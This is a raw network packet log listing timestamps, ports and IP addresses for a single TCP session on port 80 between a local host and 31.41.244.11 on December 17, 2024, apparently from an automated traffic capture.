Dec 17, 2024 06:03:12.513309956 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.513369083 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.513426065 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.514419079 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.514482975 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.514553070 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.514611959 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.515578032 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.515733004 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.515768051 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.515798092 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.516796112 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.516854048 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.517128944 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.517177105 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.518023014 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.518033981 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.518063068 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.518089056 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.519201040 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.519262075 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.519290924 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.519339085 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.520432949 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.520478010 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.520497084 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.520524979 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.521562099 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.521683931 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.521687031 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.521730900 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.522794008 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.522855997 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.522896051 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.522945881 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.524010897 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.524022102 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.524080038 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.525207996 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.525227070 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.525260925 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.525295019 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.526302099 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.526367903 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.526443958 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.526504993 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.527626038 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.527637959 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.527689934 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.528698921 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.528769016 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.528800011 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.528861046 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.530003071 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.530021906 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.530096054 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.531181097 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.531251907 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.660861015 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.660938978 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.661333084 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.661391973 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.662375927 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.662431955 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.662619114 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.662631035 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.662672997 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.663933992 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.663990974 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.664030075 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.664083004 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.665091991 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.665103912 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.665146112 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.665173054 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.666115999 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.666169882 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.666404963 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.666456938 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.667431116 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.667442083 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.667486906 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.668596029 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.668607950 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.668656111 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.669790030 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.669851065 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.670063972 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.670129061 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.670911074 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.670974970 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.671042919 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.671092987 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.671124935 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.671137094 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.671166897 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.671190977 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.672373056 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.672426939 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.672837973 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.672892094 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.675745010 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.675806046 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.675806046 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.675888062 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.675997019 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.676008940 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.676057100 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.677033901 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.677047014 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.677130938 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.677458048 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.677469969 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.677521944 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.678200006 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.678256035 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.678283930 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.678340912 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.679327965 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.679382086 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.679455996 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.679511070 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.680556059 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.680613995 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.680622101 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.680672884 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.681690931 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.681745052 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.681875944 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.681927919 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.682966948 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.682976961 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.683022022 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.684134007 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.684192896 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.684264898 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.684320927 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.685343027 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.685360909 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.685398102 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.685429096 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.686482906 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.686537981 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.686599016 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.686650991 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.687678099 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.687732935 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.687772989 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.687818050 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.689006090 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.689017057 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.689060926 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.690109968 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.690165997 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.690206051 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.690258026 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.691282034 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.691339016 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.691376925 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.691442966 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.695646048 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.695657015 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.695702076 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.695825100 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.695835114 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.695993900 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.696052074 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.696106911 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.696202040 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.696257114 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.697314978 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.697369099 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.697403908 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.697449923 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.698494911 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.698544979 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.698573112 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.698616982 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.699489117 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.699541092 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.699793100 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.699845076 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.700756073 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.700845957 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.700957060 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.700968027 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.700978994 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.701020002 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.701047897 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.702016115 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.702079058 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.702116013 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.702161074 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.703196049 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.703250885 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.703285933 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.703335047 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.704385996 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.704441071 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.704468966 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.704519033 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.705543995 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.705614090 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.705676079 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.705724955 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.706789017 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.706845045 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.706864119 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.706904888 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.707923889 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.707976103 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.708091021 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.708139896 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.709204912 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.709217072 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.709252119 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.709270000 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.710299969 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.710351944 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.710458040 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.710508108 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.711535931 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.711586952 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.711622000 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.711668968 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.712702036 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.712754965 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.712816000 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.712866068 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.713886976 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.713936090 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.714026928 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.714076996 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.715095997 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.715143919 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.715169907 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.715214014 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.716355085 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.716375113 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.716403008 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.716423988 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.717536926 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.717556953 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.717583895 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.717608929 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.718763113 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.718775034 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.718810081 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.718835115 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.719861031 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.719916105 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.720278978 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.720330000 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.721044064 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.721091986 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.721240997 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.721291065 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.722210884 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.722263098 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.722327948 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.722377062 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.853281975 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.853296041 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.853501081 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.853914022 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.853925943 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.853980064 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.854979038 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.855052948 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.855096102 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.855154991 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.856146097 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.856201887 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.856353998 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.856410027 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.857424974 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.857434988 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.857486010 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.858577013 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.858587980 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.858639956 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.859704971 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.859769106 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.859833002 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.859890938 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.860969067 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.860980034 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.861031055 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.862082958 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.862143993 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.862179995 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.862234116 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.863370895 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.863380909 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.863430977 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.864478111 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.864536047 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.864608049 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.864660978 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.865742922 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.865753889 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.865804911 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.866950989 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.866961956 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.867016077 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.867974997 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.868041992 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.868243933 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.868299007 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.869287014 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.869298935 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.869338989 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.869366884 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.870467901 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.870479107 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.870522022 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.870554924 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.871630907 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.871694088 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.871716976 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.871768951 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.872790098 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.872844934 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.872850895 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.872888088 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.873909950 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.873961926 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.873966932 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.874003887 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.875171900 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.875325918 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.875360966 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.875392914 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.876415968 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.876427889 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.876485109 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.877480030 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.877538919 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.877604008 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.877657890 CET	49830	80	192.168.2.5	31.41.244.11
